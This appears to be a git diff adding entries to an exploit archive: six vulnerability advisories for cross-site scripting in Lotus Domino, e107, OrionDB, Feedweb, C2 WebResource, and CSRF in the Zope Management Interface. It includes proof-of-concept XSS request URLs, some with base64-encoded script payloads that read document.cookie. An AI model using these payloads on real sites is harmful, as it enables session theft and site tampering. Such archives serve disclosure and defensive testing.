diff --git a/files.csv b/files.csv index c58584665..efd21d137 100755 --- a/files.csv +++ b/files.csv @@ -34693,3 +34693,9 @@ id,file,description,date,author,platform,type,port 38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross Site Scripting Vulnerability",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection Vulnerability",2013-03-25,"Fernando A. Lagos B",php,webapps,0 +38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - CSRF Vulnerabilities",2015-10-07,hyp3rlinx,python,webapps,0 +38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x 'x.nsf' Multiple Cross Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 +38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 +38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting Vulnerability",2013-03-30,"Stefan Schurtz",php,webapps,0 +38415,platforms/asp/webapps/38415.txt,"C2 WebResource 'File' Parameter Cross Site Scripting Vulnerability",2013-04-03,anonymous,asp,webapps,0 +38416,platforms/php/webapps/38416.txt,"e107 'content_preset.php' Cross Site Scripting Vulnerability",2013-04-03,"Simon Bieber",php,webapps,0 diff --git a/platforms/asp/webapps/38415.txt b/platforms/asp/webapps/38415.txt new file mode 100755 index 000000000..125f52dbc --- /dev/null +++ b/platforms/asp/webapps/38415.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/58838/info + +C2 WebResource is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/fileview.asp?File= \ No newline at end of file diff --git a/platforms/multiple/remote/38412.txt b/platforms/multiple/remote/38412.txt new file mode 100755 index 000000000..5ace112ad --- /dev/null +++ b/platforms/multiple/remote/38412.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/58715/info + +IBM Lotus Domino is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +IBM Lotus Domino 8.5.4 and prior are vulnerable. + +http://www.example.com/mail/x.nsf/CalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html; base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B + +http://www.example.com/mail/x.nsf/WebInteriorCalendarFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B + +http://www.example.com/mail/x.nsf/ToDoFS?OpenFrameSet?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B + +http://www.example.com/mail/x.nsf/WebInteriorToDoFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B \ No newline at end of file diff --git a/platforms/php/webapps/38413.txt b/platforms/php/webapps/38413.txt new file mode 100755 index 000000000..6bab1be09 --- /dev/null +++ b/platforms/php/webapps/38413.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/58720/info + +OrionDB Web Directory is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wd-demo/index.php?c= +http://www.example.com/wd-demo/index.php?c=search&category=Food&searchtext=1

3spi0n

\ No newline at end of file diff --git a/platforms/php/webapps/38414.txt b/platforms/php/webapps/38414.txt new file mode 100755 index 000000000..312b0808c --- /dev/null +++ b/platforms/php/webapps/38414.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/58771/info + +Feedweb plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Feedweb 1.8.8 and prior versions are vulnerable. + + http://www.example.com/wordpress/wp-content/plugins/feedweb/widget_remove.php?wp_post_id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/38416.txt b/platforms/php/webapps/38416.txt new file mode 100755 index 000000000..a23fd085e --- /dev/null +++ b/platforms/php/webapps/38416.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/58841/info + +e107 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +e107 1.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/e107_plugins/content/handlers/content_preset.php? %3c%00script%0d%0a>alert('reflexted%20XSS') \ No newline at end of file diff --git a/platforms/python/webapps/38411.txt b/platforms/python/webapps/38411.txt new file mode 100755 index 000000000..1c95f59ee --- /dev/null +++ b/platforms/python/webapps/38411.txt @@ -0,0 +1,157 @@ +[+] Credits: hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt + + +Vendor: +================================ +www.zope.org +plone.org + + +Product: +================================ +Zope Management Interface 4.3.7 + +Zope is a Python-based application server for building secure and highly +scalable web applications. +Plone Is a Content Management System built on top of the open source +application server Zope +and the accompanying Content Management Framework. + + +Vulnerability Type: +=================== +Cross site request forgery (CSRF) + +Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope +Management Interface). +Patches to Zope and Plone for multiple CSRF issues. + +https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope +https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf + + +CVE Reference: +============== +NA + + +Vulnerability Details: +===================== + +Security vulnerability: 20151006 - CSRF +ZMI is mostly unprotected from CSRF vulnerabilities. + +Versions affected + +4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5, +4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2 +4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4, +4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6 +3.3.5, 3.3.4. 3.3.3, 3.3.2, 3.3.1, 3.3 + +All versions of Plone prior to 5.x are vulnerable. + + +Fixed by +Nathan Van Gheem, of the Plone Security Team +Coordinated by Plone Security Team + +patch was released and is available from +https://pypi.python.org/pypi/plone4.csrffixes + + +Exploit code(s): +=============== + + + + +Plone CSRF Add Linxs & Persistent XSS + + + + + +
+ + + + +
+ + +2) CSRF to Persistent XSS - Zope Management Interface +++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +Persistent XSS via CSRF on title change properties tab, this will execute +on each Zope page accessed by users. + +CSRF to Persistent XSS POC Code: +================================= + +
+ + +
+ + +Disclosure Timeline: +========================================================= +Vulnerability reported: 2015-08-30 +Hotfix released: 2015-10-06 + + +Exploitation Technique: +======================= +Remote +Vector NETWORK +Complexity LOW +Authentication NONE +Confidentiality NONE +Integrity PARTIAL +Availability PARTIAL + + +Severity Level: +========================================================= +6.4 – MEDIUM + + +Description: +========================================================== + + +Request Method(s): [+] POST + + +Vulnerable Product: [+] Zope Management Interface & all +versions of Plone prior to 5.x are vulnerable. + + +=========================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx